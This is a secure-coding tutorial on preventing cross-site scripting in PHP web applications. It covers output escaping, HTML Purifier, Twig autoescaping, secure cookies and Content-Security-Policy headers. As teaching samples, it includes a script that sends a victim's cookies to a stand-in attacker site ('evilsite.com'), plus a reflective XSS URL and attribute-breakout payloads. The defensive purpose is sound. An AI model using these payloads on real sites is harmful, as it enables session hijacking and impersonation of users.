Cross-site scripting (XSS) vulnerabilities are among the most common flaws in web applications. They're a special case of code injection: where SQL injection, local/remote file inclusion, and OS command injection target the server, XSS exclusively targets the users of a website.
There are two main varieties of XSS vulnerabilities we need to consider when planning our defenses:
- Stored XSS occurs when data you submit to a website is persisted (on disk or in RAM) across requests, usually with the goal of executing when a privileged user accesses a particular web page.
- Reflective XSS occurs when a particular page can be used to execute arbitrary code, but it does not persist the attack code across multiple requests. Since an attacker needs to send a user to a specially crafted URL for the code to run, reflective XSS usually requires some social engineering to pull off.
An attacker who successfully exploits an XSS vulnerability can:
- Steal your session identifier so they can impersonate you and access the web application.
- Redirect you to a phishing page that gathers sensitive information.
- Install malware on your computer (usually requires a 0day vulnerability for your browser and OS).
- Perform tasks on your behalf (e.g. create a new administrator account with the attacker's credentials).
Brief XSS Mitigation Guide
- If your framework has a templating engine that offers automatic contextual filtering, use that.
- echo htmlspecialchars($string, ENT_QUOTES | ENT_HTML5, 'UTF-8'); is a safe and effective way to stop all XSS attacks on a UTF-8 encoded web page, but doesn't allow any HTML.
- If your requirements allow you to use Markdown instead of HTML, don't use HTML.
- If you need to allow some HTML and aren't using a templating engine (see #1), use HTML Purifier.
What Does an XSS Vulnerability Look Like?
XSS vulnerabilities can occur anywhere that information which any user can alter is included in the output of a web page without being properly escaped.
Example 1
<div id="profile"><?php echo $user['profile']; ?></div>
This is a potential stored XSS injection point (assuming the profile field was pulled straight from the database without escaping). If a malicious user is able to include a snippet that looks like this, they can exploit any authenticated user who visits their profile and steal their cookies for future impersonation efforts:
<script>
window.open("http://evilsite.com/cookie_stealer.php?cookie=" + document.cookie, "_blank");
</script>
Example 2
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
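The above snippet is vulnerable to reflective XSS attacks, because $_SERVER['PHP_SELF'] includes any path information appended after the script name (the query string is not part of it). Just trick a user into visiting
/form.php/%22%20onload%3D%22alert(%27XSS%27)%3B
and the form tag in the page they receive will carry an event handler attribute of the attacker's choosing:
<form action="/form.php/" onload="alert('XSS');" method="post">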
Unlike SQL Injection, which prepared statements defeat 100% of the time, cross-site scripting doesn't have an industry standard strategy for separating data from instructions. You have to escape special characters to prevent attacks.
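Applied to the two examples above, escaping on output could look like the following minimal sketch. The $user array and the $phpSelf value are hard-coded stand-ins (assumptions for illustration) for the database row and for $_SERVER['PHP_SELF'].

```php
<?php
// Stand-in for a profile row loaded from the database (hypothetical data)
$user = ['profile' => '<script>alert("XSS");</script>'];

// Stand-in for $_SERVER['PHP_SELF'] carrying an attacker-supplied payload
$phpSelf = '/form.php/" onload="alert(\'XSS\');';

// Escape each value at the moment it is written into the page
$safeProfile = htmlspecialchars($user['profile'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
$safeAction  = htmlspecialchars($phpSelf, ENT_QUOTES | ENT_HTML5, 'UTF-8');

echo '<div id="profile">', $safeProfile, '</div>', "\n";
echo '<form action="', $safeAction, '" method="post">', "\n";
```

With the quote and angle-bracket characters turned into entities, the browser treats both payloads as text rather than markup.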
The Quick and Dirty XSS Mitigation Technique for PHP Applications
The simplest and most effective way to prevent XSS attacks is the nuclear option: Ruthlessly escape any character that can affect the structure of your document.
For best results, you want to use the built-in htmlspecialchars() function that PHP offers instead of playing with string escaping yourself.
<?php
/**
 * Escape all HTML, JavaScript, and CSS
 *
 * @param string $input The input string
 * @param string $encoding Which character encoding are we using?
 * @return string
 */
function noHTML($input, $encoding = 'UTF-8')
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, $encoding);
}

// Escape every value on output, in attribute values and element content alike
echo '<h2 title="', noHTML($title), '">', noHTML($articleTitle), '</h2>', "\n";
echo noHTML($some_data), "\n";
The security of this construction depends on the presence of the ENT_QUOTES flag when it is used to escape HTML attribute values. It's important to note that this prevents any HTML in $some_data from being rendered as markup on the web page; it is displayed as literal text instead.
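To see why the flag matters, the following sketch compares ENT_COMPAT with ENT_QUOTES on a value destined for a single-quoted attribute. The payload string and the <input> markup are made up for illustration.

```php
<?php
// Hypothetical attacker-supplied value aimed at a single-quoted attribute
$payload = "' onmouseover='alert(1)";

// ENT_COMPAT escapes double quotes only, so the single quotes survive
$compat = htmlspecialchars($payload, ENT_COMPAT | ENT_HTML5, 'UTF-8');

// ENT_QUOTES escapes both kinds of quote
$quotes = htmlspecialchars($payload, ENT_QUOTES | ENT_HTML5, 'UTF-8');

echo "<input value='", $compat, "'>\n"; // the payload breaks out of the attribute
echo "<input value='", $quotes, "'>\n"; // the payload stays inside the attribute
```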
Why ENT_QUOTES | ENT_HTML5 and 'UTF-8'?
We specify ENT_QUOTES to tell htmlspecialchars() to escape quote characters (" and '). This is helpful for situations such as:
<input type="text" name="field" value="<?php echo $escaped_value; ?>" />
If quote characters are left unescaped (ENT_NOQUOTES escapes neither kind, and ENT_COMPAT leaves single quotes alone), an attacker simply needs to pass
" onload="malicious javascript code
as a value to that form field, using whichever quote character delimits the attribute, and presto, instant client-side code execution.
We specify ENT_HTML5 and 'UTF-8' so htmlspecialchars() knows what character set and version of the HTML standard to work with.
The reason we need to specify both values is that, as demonstrated against mysql_real_escape_string(), an incorrect (especially attacker-controlled) character encoding can defeat string-based escaping strategies.
For the sake of safety and consistency, the encoding we specify here, the encoding sent in the charset attribute of the <meta> tag, and the charset added to the Content-Type HTTP header should all match.
Important - Avoid Premature Optimization
Always escape data on output (when displaying to a user).
Do not escape user input against XSS attacks before inserting into a database. WordPress made this mistake, and security researcher Jouko Pynnönen of Klikki Oy eventually realized that MySQL column truncation can defeat before-insert XSS prevention strategies.
You should still be validating your input, however. If you're expecting an email address, make sure it's formatted like one.
$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL);
if ($email === false) {
    // Not a valid email address! Handle this invalid input here.
}
If you're using MySQL, make sure any values going into a TEXT field will fit in less than 64 KiB. Outside of strict SQL mode, MySQL will silently truncate any value that exceeds a TEXT field's length, which can cause both security issues (as WordPress experienced) and data integrity issues.
The "escape all HTML entities" approach is secure and works wonderfully for situations where users should not be providing their own HTML markup. But what if you need to allow some markup without opening the door to arbitrary markup?
Put another way: How can we allow users to provide their own rich text markup without allowing them to execute arbitrary JavaScript in visitors' browsers?
Avoid HTML If You Can
An attractive solution is to adopt a rendering format such as BBCode, Markdown, or ReStructuredText instead of allowing raw HTML. This allows us to continue to reject all HTML entities while still allowing a limited subset of markup options to make a user's contributions more expressive and powerful.
If you can avoid accepting raw HTML by using another markup language such as Markdown, please do so. If you can bolt a WYSIWYG editor onto it for non-technical users, even better.
An Order of HTML Please, Hold the XSS Payload
Although we can easily stop all XSS attacks by preventing any HTML markup characters from breaking the document structure, this is often not the desired outcome. For some use cases (blog comments, user profiles, etc.) we want to allow our end users to be free to express themselves, within reason. But at the same time, we don't want users to be able to abuse this potential for customization to attack other users.
How can we resolve this conflict? Simple: Use a library such as HTML Purifier. Most of the clever XSS tricks hidden in the HTML specification are easily defeated by HTML Purifier, if used correctly.
How to Use HTMLPurifier to Stop XSS Attacks
Instead of attempting to naively search and replace malicious snippets in a string of user input, HTML Purifier digests the entire string as an HTML document, breaks it into tokens, and validates all elements and attributes against a whitelist and the RFC definitions for each attribute.
<?php
/**
* Setup HTML Purifier
*/
require_once '/path/to/HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
$htmlp = new HTMLPurifier($config);
/* etc. */
?>
<!-- etc etc etc. -->
<div id="profile"><?php
// Use HTML Purifier to prevent XSS in this user's profile
echo $htmlp->purify($user['profile']);
?></div>
Optimizing HTMLPurifier
Running HTML Purifier on every page load is a performance concern that can be easily fixed by caching. When you insert data into your database, keep the original values intact (e.g. for logging and threat intelligence purposes), but also store a purified version and use the purified HTML when displaying to end users.
This "store, purify, cache, serve from cache" strategy allows you to enjoy the performance benefits developers normally get from filtering on input, but without causing a permanent loss of data. It also allows you to re-purify your original values in the event that you need to (e.g. if HTML Purifier has a bug with HTML5 output and they release a new version that fixes it).
$db->insert('blog_comments', [
/* Other fields */
'original_body' => $_POST['body'],
'rendered_body' => $htmlp->purify($_POST['body'])
]);
Important: When Not to Use HTML Purifier
HTML Purifier expects to operate in the context of an HTML document, not a string within an HTML attribute. The library isn't psychic. It cannot tell what the rest of the web page is doing immediately before and after the untrusted string you invoke it on.
For example, even though it's using HTML Purifier, the following snippet is still insecure:
<img src="user.php?username=<?php echo $htmlp->purify($_GET['username']); ?>" />
Simply pass the string
" onload="alert('XSS');
to username and you have client-side code execution.
When inserting any variables into another context, you should also run them through htmlspecialchars() (or noHTML() above) to ensure they don't break out and add extra attributes to the parent element.
This is safe:
<img src="user.php?username=<?php echo noHTML($htmlp->purify($_GET['username'])); ?>" />
This, too, is safe:
<?php echo $htmlp->purify("<img src=\"user.php?username=".$_GET['username']."\" />"); ?>
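Because the value in the first safe example also sits inside a URL query string, one further refinement is to URL-encode it before HTML-escaping the attribute as a whole. This is a minimal sketch, not part of the examples above; $username is a hard-coded stand-in for $_GET['username'], and noHTML() is repeated so the snippet runs on its own.

```php
<?php
function noHTML($input, $encoding = 'UTF-8')
{
    return htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, $encoding);
}

// Stand-in for $_GET['username'] (attacker-controlled)
$username = '" onload="alert(\'XSS\');';

// 1. rawurlencode() makes the value safe as a query-string parameter
// 2. noHTML() makes the finished URL safe as an HTML attribute value
$src = noHTML('user.php?username=' . rawurlencode($username));

echo '<img src="', $src, '" />', "\n";
```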
As it turns out, context matters a lot for preventing cross-site scripting attacks. What's secure in one context (e.g. HTML is allowed) could be disastrous in other contexts (e.g. we're in the middle of an HTML attribute).
What About Other Contexts?
We've uncovered two rules for preventing XSS attacks so far:
- Always escape all HTML entities (e.g. with noHTML() defined above) when inserting data into an HTML attribute.
- Always purify (e.g. with HTML Purifier) when you wish to allow safe HTML from the input string to appear in the rendered web page.
But what if we need to place data inside a style tag or attribute? What if we want to define a default value for a JavaScript variable?
Context-Sensitive HTML Escaping in Template Engines
Every context within an HTML document requires distinct escaping rules that are not always relevant to other contexts. Fortunately, there's an easy way to tackle all this complexity without a great deal of effort or research: Use templating libraries.
A popular PHP templating engine, Twig, makes contextual XSS filtering a walk in the park:
{% autoescape 'css' %}
<p style="color: {{ color|default('#0f0') }};">Test</p>
{% endautoescape %}
{% autoescape 'html' %}
{{ some_var }}
{{ not_user_provided|raw }}
<p class="{{ class|e('html_attr') }}">
<a href="/user/{{ username|e('url') }}">{{ username }}</a>
</p>
{% endautoescape %}
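Outside a template engine, the JavaScript-variable case mentioned earlier is commonly handled in plain PHP with json_encode() and its JSON_HEX_* flags. This is a minimal sketch, assuming PHP 7.3 or later and a value written inside a <script> block; the function name jsValue() and the variable defaultName are invented for this example.

```php
<?php
/**
 * Hypothetical helper: encode a PHP value as a JavaScript literal that is
 * safe to place inside a <script> element.
 */
function jsValue($value): string
{
    // The JSON_HEX_* flags turn <, >, &, ' and " inside the value into \uXXXX
    // escapes, so the output cannot close the surrounding <script> tag
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Stand-in for an untrusted value
$untrusted = '</script><script>alert("XSS")</script>';
$literal = jsValue($untrusted);

echo '<script>var defaultName = ', $literal, ';</script>', "\n";
```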
If you're using Twig, you should prefer wrapping entire sections in {% autoescape %} blocks over applying |e filters to every printed template variable. Not only does auto-escaping make your code easier to read, but it prevents a single oversight from becoming an entry point for an attacker with a malicious payload.
Browser-Level XSS Mitigation
There are a number of security features supported by all modern web browsers that significantly reduce the impact of XSS vulnerabilities. Even if you manage to escape every variable you output, it would be a very good idea to use these features. We are going to focus on two: HTTPS-only cookies (that is, HTTP-only cookies that are transmitted only over TLS) and Content-Security-Policy headers.
Secure Cookies
Any time you set a cookie in PHP, you should set both httpOnly and secure to true. (This assumes your website is only accessible over HTTPS, which it should be.)
Your session cookie, especially, should not be made available to JavaScript. This can be achieved either by adding these lines to php.ini, or by setting them manually on every request:
session.cookie_httponly = On
session.cookie_secure = On
Setting the session cookie parameters on every page load:
session_set_cookie_params(
    0, // Lifetime -- 0 means erase when browser closes
    '/', // Which paths are these cookies relevant?
    '.yourdomain.com', // Only expose this to which domain?
    true, // Only send over the network when TLS is used
    true // Don't expose to JavaScript
);
session_start();
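On PHP 7.3 and later, session_set_cookie_params() also accepts an array, which makes each parameter's purpose easier to read. This is a minimal sketch with the same values as above; '.yourdomain.com' remains a placeholder, and session_start() would follow as before.

```php
<?php
// Array form (PHP 7.3+): the keys name each parameter explicitly.
// Call this before any output is sent and before session_start().
session_set_cookie_params([
    'lifetime' => 0,                 // Erase when the browser closes
    'path'     => '/',               // Relevant for every path
    'domain'   => '.yourdomain.com', // Placeholder domain
    'secure'   => true,              // Only send over TLS
    'httponly' => true,              // Don't expose to JavaScript
]);

// Read the settings back to confirm what will be applied
$params = session_get_cookie_params();
```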
Content-Security-Policy headers
Content-Security-Policy headers significantly reduce the risk and impact of XSS attacks in modern browsers by specifying a whitelist in the HTTP response headers that dictates what the HTTP response body can do. They don't protect against an attacker capable of modifying the source files on the server, but most real-world XSS payloads will fail to execute if the headers are used properly.
An example of a CSP header looks like this:
Content-Security-Policy: script-src 'self' https://ajax.googleapis.com https://www.google-analytics.com; child-src 'none'; object-src 'none'; upgrade-insecure-requests
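A header like this can be assembled and sent from PHP. The sketch below is one possible way to do it; buildCspHeader() is a hypothetical helper written for this example, not part of any library.

```php
<?php
/**
 * Hypothetical helper: join a map of CSP directives into a header value.
 *
 * @param array $directives Directive name => list of allowed sources
 * @return string
 */
function buildCspHeader(array $directives): string
{
    $parts = [];
    foreach ($directives as $name => $sources) {
        // A directive without sources (e.g. upgrade-insecure-requests) is emitted bare
        $parts[] = $sources === [] ? $name : $name . ' ' . implode(' ', $sources);
    }
    return implode('; ', $parts);
}

$csp = buildCspHeader([
    'script-src' => ["'self'", 'https://ajax.googleapis.com', 'https://www.google-analytics.com'],
    'child-src' => ["'none'"],
    'object-src' => ["'none'"],
    'upgrade-insecure-requests' => [],
]);

// Headers must be sent before any of the response body
if (!headers_sent()) {
    header('Content-Security-Policy: ' . $csp);
}
```

Keeping the policy in an array makes it easier to vary a single directive per request than editing one long string.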
HTML5 Rocks has a great introductory tutorial for Content-Security-Policy headers if you would like to learn more about writing them.
Paragon Initiative Enterprises' CSP Builder
Ever wanted to make Content-Security-Policy headers easier to manage? Whether you'd rather just edit a JSON file than remember the syntax of a CSP header, or you'd rather build the headers for a particular request programmatically (e.g. to use the script-nonce feature), check out our MIT-licensed CSP Builder project.
Summary
- Use Content-Security-Policy headers and HTTPS-only cookies.
- Your first line of defense against XSS attacks should be filtering any tainted information before inserting it in the DOM, not before storing it in a database.
- If you can avoid accepting actual HTML by opting for Markdown, etc. then don't accept HTML.
- If you're using a templating engine such as Twig, use {% autoescape %} directives and |e filters where appropriate. {% autoescape %} should be prioritized over escaping every variable.
- If you're not using a templating engine and need to safely render user-provided HTML, use HTML Purifier. Feel free to leverage caching for optimization, but keep an intact copy on-hand.
- Otherwise, use noHTML() and leave nothing to chance.